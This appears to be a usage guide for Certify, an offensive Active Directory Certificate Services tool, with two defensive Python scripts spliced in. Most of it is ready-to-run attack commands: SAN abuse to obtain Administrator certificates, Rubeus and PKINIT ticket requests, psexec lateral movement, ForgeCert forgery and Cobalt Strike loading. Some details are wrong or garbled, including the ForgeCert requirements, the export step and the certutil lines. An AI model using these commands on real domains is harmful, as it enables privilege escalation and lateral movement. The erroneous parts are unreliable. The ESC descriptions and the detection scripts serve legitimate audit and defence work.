Certify
Certify is a .NET tool for enumerating and abusing Active Directory Certificate Services (AD CS) to identify vulnerable certificate templates and misconfigured certification authorities for privilege escalation and lateral movement.
Installation
Compile from Source
Clone the GhostPack repository and compile with Visual Studio:
git clone https://github.com/GhostPack/Certify.git
cd Certify
# Open Certify.sln in Visual Studio 2019/2022
# Build > Build Solution (Release x64)
# Output: Certify.exe in bin/Release/
Precompiled Releases
Download precompiled binaries from the GitHub releases page:
# Extract and execute directly
.\Certify.exe find /vulnerable
Execute-Assembly in Cobalt Strike
Load Certify as a .NET assembly in Cobalt Strike for in-memory execution:
beacon> execute-assembly /path/to/Certify.exe find /vulnerable
Quick Start
Find Vulnerable Templates
# Enumerate all templates and identify those with known vulnerabilities (ESC1-ESC8)
Certify.exe find /vulnerable
Enumerate All CAs
# List all certification authorities in the domain
Certify.exe cas
Enumerate All Templates
# Display all certificate templates available for enrollment
Certify.exe find
Enumeration
Enumerate Certification Authorities
# List all CAs with detailed information
Certify.exe cas
# Output includes:
# - CA Name
# - DN (Distinguished Name)
# - Certificate Subject
# - Web Enrollment support
Enumerate Certificate Templates
# List all available templates with enrollment requirements
Certify.exe find
# Displays:
# - Template Name
# - EKU (Extended Key Usage)
# - Enrollment Rights
# - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag
# - Manager Approval requirement
# - Authorized Signatures
Find Vulnerable Templates
# Identify templates vulnerable to ESC1-ESC8 attacks
Certify.exe find /vulnerable
# Highlights potentially exploitable misconfigurations
Filter by Template Purpose
# Find templates allowing client authentication (ESC1/ESC3)
Certify.exe find /clientauth
# Find templates where enrollee supplies subject (ESC1)
Certify.exe find /enrolleeSuppliesSubject
Enumerate PKI Objects and Permissions
# Display detailed PKI object information including permissions
Certify.exe pkiobjects
# Shows CA access control lists and enrollment agent permissions
Certificate Request
Basic Certificate Request
# Request a certificate from a specific CA using the target template
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User
Subject Alternative Name (SAN) Abuse
# Add alternate principal name (ESC1 exploitation)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /altname:Administrator
# Common targets for SAN abuse:
# /altname:Administrator # Domain admin user
# /altname:DOMAIN\Administrator # Fully qualified name
# /altname:krbtgt # KDC account
On-Behalf-Of Enrollment
# Request certificate on behalf of another user (enrollment agent abuse)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /onbehalfof:DOMAIN\Administrator
Install Certificate After Request
# Install generated certificate in current user's personal store
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install
# Certificate stored in:
# Cert:\CurrentUser\My\[Thumbprint]
Export Certificate to File
# Request and output certificate/key to PFX (contains private key)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install
# Retrieve it from the certificate store and export it to a PFX file
# (see Certificate Installation and Usage below)
Vulnerable Template Identification
ESC1: Unrestricted Enrollment + SAN Abuse
Conditions:
- Template allows any principal to enroll
- Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set)
- EKU includes client authentication
- Manager approval not required
Certify identifies: [!] Enrollee supplies subject
Exploitation: Request cert with /altname:Administrator and use for authentication.
ESC2: Certificate Template Abuse (General Abuse)
Conditions:
- Any EKU allows any purpose
- Enrollee supplies subject enabled
- No manager approval
Certify identifies: [!] ANY_PURPOSE EKU
Exploitation: Request cert for arbitrary use cases (authentication, signing, encryption).
ESC3: Enrollment Agent Abuse
Conditions:
- Enrollment Agent template allows unrestricted enrollment
- Any principal can request as another user
- Target user’s template allows enrollment
Certify identifies: [!] Enrollment Agent template + enrollment rights mismatch
Exploitation: Use /onbehalfof to request certs for high-privilege users.
ESC4: Misconfigured Certificate Template Permissions
Conditions:
- Low-privileged user has ModifyTemplate rights
- Can modify template settings to create vulnerability
- Change EKU, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, permissions
Certify identifies: Template permissions via pkiobjects
Exploitation: Modify template then request exploitable certificate.
ESC5: Vulnerable PKI Object Permissions
Conditions:
- Low-privileged user has dangerous permissions over CA/templates
- FullControl, Write, WriteDacl on PKI objects
- Can modify CA configuration or template settings
Certify identifies: via pkiobjects + low-priv user with ACE
Exploitation: Modify template CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or CA settings.
ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag
Conditions:
- CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
- Allows client-supplied SubjectAltName in requests
- Default template allows any user to request
Certify identifies: [!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
Exploitation: Request cert with arbitrary SAN on any template.
ESC7: Vulnerable CA Access Control
Conditions:
- Low-privileged user has dangerous permissions (Manage Certificates, etc.)
- Can approve/deny pending requests
- Can configure CA settings
Certify identifies: via pkiobjects + ACL review
Exploitation: Approve own requests, modify CA configuration.
ESC8: Web Enrollment Enabled
Conditions:
- CA has web enrollment service enabled
- Accessible without authentication or with weak auth
- No request validation
Certify identifies: [+] Web Enrollment Enabled
Exploitation: Submit request directly via HTTP without strong auth.
CA Enumeration Details
CA Permissions and Access Control
# Review CA access control lists
Certify.exe pkiobjects
# Look for:
# - Low-privileged users with "Manage Certificates"
# - Non-admin users with CA access
# - Enrollment agent permissions
EDITF Flags
# CA with EDITF_ATTRIBUTESUBJECTALTNAME2 allows client-supplied SANs
# This creates ESC6 vulnerability if any template allows unrestricted enrollment
Certify.exe cas
# Look for "[!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled"
Web Enrollment Endpoints
# Check for enabled web enrollment service
Certify.exe cas
# Web enrollment typically hosted at:
# http://CA-SERVER/certsrv/
# https://CA-SERVER/certsrv/
# Request certificate via HTTP POST if authentication is weak/missing
Template Analysis
Understanding Certify Output
[+] Template Name: User
[+] Template Schema Version: 2
[+] Display Name: User
[+] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com
[+] Enrollment Rights:
Authenticated Users - Full (2032)
[+] EKU: Client Authentication, Email Protection
[+] Enrollee Supplies Subject: True
[+] Manager Approval: False
[+] Requires Authorized Signatures: 0
[+] Authorized Signatures:
[+] CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: True
Key Fields
| Field | Meaning |
|---|---|
| Enrollee Supplies Subject | User can specify certificate subject/SAN |
| CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT | Certificate template flag enabling above |
| EKU | Extended Key Usage (Client Auth, Server Auth, Code Signing, etc.) |
| Enrollment Rights | Which principals can request from this template |
| Manager Approval | Requires CA manager to approve request |
| Authorized Signatures | Number of authorized signatures required |
| ANY_PURPOSE | Dangerous EKU allowing any usage |
Dangerous Configurations
[!] Enrollee supplies subject
[!] Any principal can enroll
[!] Client Authentication EKU present
[!] Manager Approval: False
[!] Authorized Signatures: 0
# All together = ESC1 vulnerability
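As an added example (not Certify's own code, nor from the page's author), the following Python parses output in the layout shown under Understanding Certify Output above and applies the five conditions this section lists as the ESC1 conjunction, plus the ANY_PURPOSE EKU check the page names under ESC2. The sample output is constructed: the first template mirrors the page's User example, the second is a hardened copy added for contrast.

```python
import re

# Constructed sample in Certify `find` layout: the page's "User" example, then a hardened copy.
SAMPLE_FIND_OUTPUT = """\
[+] Template Name: User
[+] Enrollment Rights:
    Authenticated Users - Full (2032)
[+] EKU: Client Authentication, Email Protection
[+] Enrollee Supplies Subject: True
[+] Manager Approval: False
[+] Requires Authorized Signatures: 0

[+] Template Name: User-Hardened
[+] Enrollment Rights:
    DOMAIN\\PKI-Enrollers - Full (2032)
[+] EKU: Client Authentication
[+] Enrollee Supplies Subject: False
[+] Manager Approval: True
[+] Requires Authorized Signatures: 1
"""

BROAD_PRINCIPALS = ("authenticated users", "domain users", "everyone")  # "any principal can enroll"


def parse_templates(text):
    """One {field: value} dict per template; indented ACE lines are appended to the preceding field."""
    templates, last_key = [], None
    for raw in text.splitlines():
        m = re.match(r"^\[\+\]\s*([^:]+):\s*(.*)$", raw)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Template Name" or not templates:
                templates.append({})
            templates[-1][key], last_key = value, key
        elif raw.strip() and templates and last_key:
            templates[-1][last_key] = (templates[-1][last_key] + " " + raw.strip()).strip()
    return templates


def esc_findings(t):
    """The page's ESC1 conjunction, plus the ANY_PURPOSE EKU check it lists under ESC2."""
    rights, eku = t.get("Enrollment Rights", "").lower(), t.get("EKU", "").lower()
    broad = any(p in rights for p in BROAD_PRINCIPALS)
    supplies_subject = t.get("Enrollee Supplies Subject", "").lower() == "true"
    no_approval = t.get("Manager Approval", "").lower() == "false"
    no_sigs = t.get("Requires Authorized Signatures", "0") in ("", "0")
    base = broad and supplies_subject and no_approval and no_sigs
    return [esc for esc, eku_hit in (("ESC1", "client authentication" in eku),
                                     ("ESC2", "any purpose" in eku)) if base and eku_hit]


def audit(text):
    return {t["Template Name"]: esc_findings(t) for t in parse_templates(text)}
```

Running `audit(SAMPLE_FIND_OUTPUT)` reports ESC1 for the User template and nothing for the hardened copy, whose enrollment rights, approval and signature settings break the conjunction.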
Certificate Installation and Usage
Export Certificate to PFX
# From certificate store to file
$cert = Get-ChildItem Cert:\CurrentUser\My\[Thumbprint]
$password = ConvertTo-SecureString -String "password" -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath cert.pfx -Password $password
Convert PFX to Rubeus Format
# Install openssl or use WSL
openssl pkcs12 -in cert.pfx -out cert.pem -nodes -passin pass:password
# Load into Rubeus for Kerberos authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pem /createnetonly:C:\Windows\System32\cmd.exe
Pass-the-Cert Attack
# Use certificate for authentication without plaintext password
# Via Rubeus PKINIT
Rubeus.exe asktgt /user:Administrator /certificate:C:\path\to\cert.pfx /password:certpassword /createnetonly:C:\Windows\System32\cmd.exe
# Spawns process with TGT for Administrator
# Use for lateral movement and persistence
PKINIT and Kerberos
# PKINITtools - Kerberos authentication via certificate
# Requires certificate with Client Authentication EKU
# Request TGT using certificate identity
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password domain.com\\Administrator administrator.ccache
# Use ccache for lateral movement
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET
Troubleshooting
"Access Denied" During Enumeration
# Running as non-domain-joined user or unauthenticated
# Ensure domain connectivity and valid credentials
# Run as domain user:
runas /user:DOMAIN\username cmd.exe
# Then execute Certify.exe
No Vulnerable Templates Found
# May indicate:
# 1. Templates properly secured (no ESC conditions)
# 2. Organization hardened against ADCS attacks
# 3. Limited template visibility for current user
# Review all templates regardless:
Certify.exe find
# Manually analyze based on ESC conditions above
Certificate Request Denied
# Reasons:
# - Insufficient enrollment rights
# - Template requires manager approval (pending request)
# - CA configured to deny certain principals
# Check enrollment rights:
Certify.exe find /template:TemplateName
# Review "Enrollment Rights" output
Web Enrollment 404 or Unavailable
# CA web enrollment service not running or disabled
# Fallback to direct CA RPC interface
# Certify uses RPC by default, web enrollment is optional
# Check CA configuration for enabled services
Best Practices
| Practice | Description |
|---|---|
| Review All Templates | Run Certify.exe find and manually review against ESC conditions |
| Monitor Enrollments | Track certificate requests on CAs for suspicious activity |
| Restrict SAN Abuse | Disable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on sensitive templates |
| Enforce Approvals | Require manager approval for privileged templates |
| Limit Enrollment Rights | Restrict principals able to enroll (not Authenticated Users) |
| Disable EDITF Flags | Review and remove unnecessary EDITF_* flags on CAs |
| RBAC on PKI Objects | Limit template modification and CA access to admins |
| Certificate Auditing | Monitor issued certificates for anomalies |
| EKU Restrictions | Use specific EKUs (not ANY_PURPOSE) |
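The Monitor Enrollments and Certificate Auditing rows describe detection; as an added example (not part of the page or of any tool it lists), this Python triages records shaped like the Windows Security event 4887 message (Certificate Services approved a certificate request and issued a certificate) for two signals tied to the page's ESC6 and enrollee-supplied-subject conditions: a SAN passed as a request attribute, and a subject or SAN identity that differs from the requesting account. The event records are constructed, and a SAN carried inside the CSR itself does not appear in this event, so that case has to be reviewed from the CA database instead.

```python
import re

# Constructed records modelled on the Windows Security event 4887 message. The field
# labels are the event's; every value is invented for this example.
SAMPLE_EVENTS = [
    "Request ID: 1041\nRequester: DOMAIN\\jdoe\nAttributes: CertificateTemplate:User\n"
    "Disposition: 3\nSKI: 0A 1B 2C\nSubject: CN=jdoe,CN=Users,DC=domain,DC=com",
    "Request ID: 1042\nRequester: DOMAIN\\jdoe\nAttributes: CertificateTemplate:User\n"
    "SAN:upn=administrator@domain.com\nDisposition: 3\nSKI: 0D 1E 2F\n"
    "Subject: CN=jdoe,CN=Users,DC=domain,DC=com",
    "Request ID: 1043\nRequester: DOMAIN\\jdoe\nAttributes: CertificateTemplate:User\n"
    "Disposition: 3\nSKI: 0A 0B 0C\nSubject: CN=Administrator,CN=Users,DC=domain,DC=com",
]

# Labelled fields in the order the event prints them; Attributes may span several lines.
FIELD_RE = re.compile(
    r"Request ID:\s*(?P<request_id>.*?)\s*Requester:\s*(?P<requester>.*?)\s*"
    r"Attributes:\s*(?P<attributes>.*?)\s*Disposition:\s*(?P<disposition>.*?)\s*"
    r"SKI:\s*(?P<ski>.*?)\s*Subject:\s*(?P<subject>.*)\Z", re.S)

def parse_event(text):
    m = FIELD_RE.search(text)  # None when the layout does not match
    return {k: v.strip() for k, v in m.groupdict().items()} if m else None

def account_name(principal):
    return principal.rsplit("\\", 1)[-1].split("@", 1)[0].lower()  # DOMAIN\u or u@d -> u

def review_issuance(ev):
    """Reasons an issuance deserves analyst attention (empty list if none)."""
    requester, reasons = account_name(ev["requester"]), []
    # A SAN passed as a request *attribute* is only honoured when the CA has
    # EDITF_ATTRIBUTESUBJECTALTNAME2 set (ESC6), so its presence alone is worth a look.
    san = re.search(r"SAN:\s*upn=([^\s,]+)", ev["attributes"], re.I)
    if san:
        reasons.append(f"attribute-supplied SAN for {san.group(1)}")
        if account_name(san.group(1)) != requester:
            reasons.append("SAN identity differs from requester")
    # With an enrollee-supplied subject, the CN can name a different account than the requester.
    cn = re.search(r"CN=([^,]+)", ev["subject"])
    if cn and cn.group(1).lower() != requester:
        reasons.append(f"subject CN {cn.group(1)} differs from requester {requester}")
    return reasons

def triage(events):
    flagged = {}  # request ID -> reasons, only for events that raised at least one
    for ev in filter(None, map(parse_event, events)):
        if reasons := review_issuance(ev):
            flagged[ev["request_id"]] = reasons
    return flagged
```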
Related Tools
Certipy (Python)
# Python ADCS enumeration and exploitation
certipy find -u user@domain.com -p password -dc-ip 10.0.0.1
certipy req -u user@domain.com -p password -ca CA-NAME -template User
ForgeCert
# Forge certificates without CA interaction
# Requires NTLM hash of CA account
ForgeCert.exe --CaCert ca-cert.cer --CaKey ca-key.key --Subject CN=Administrator
Rubeus
# Kerberos manipulation and PKINIT authentication
# Integrated with certificate-based authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx
PKINITtools
# Kerberos PKINIT support and certificate-based auth
# Cross-platform (Python/Linux)
getTGT.py -cert-pfx cert.pfx DOMAIN/Administrator
Certutil (Native Windows)
# Native Windows utility for certificate operations
certutil -config CA-NAME -ca.cert ca-cert.cer
# Request certificate directly
certutil -ca.cert -crl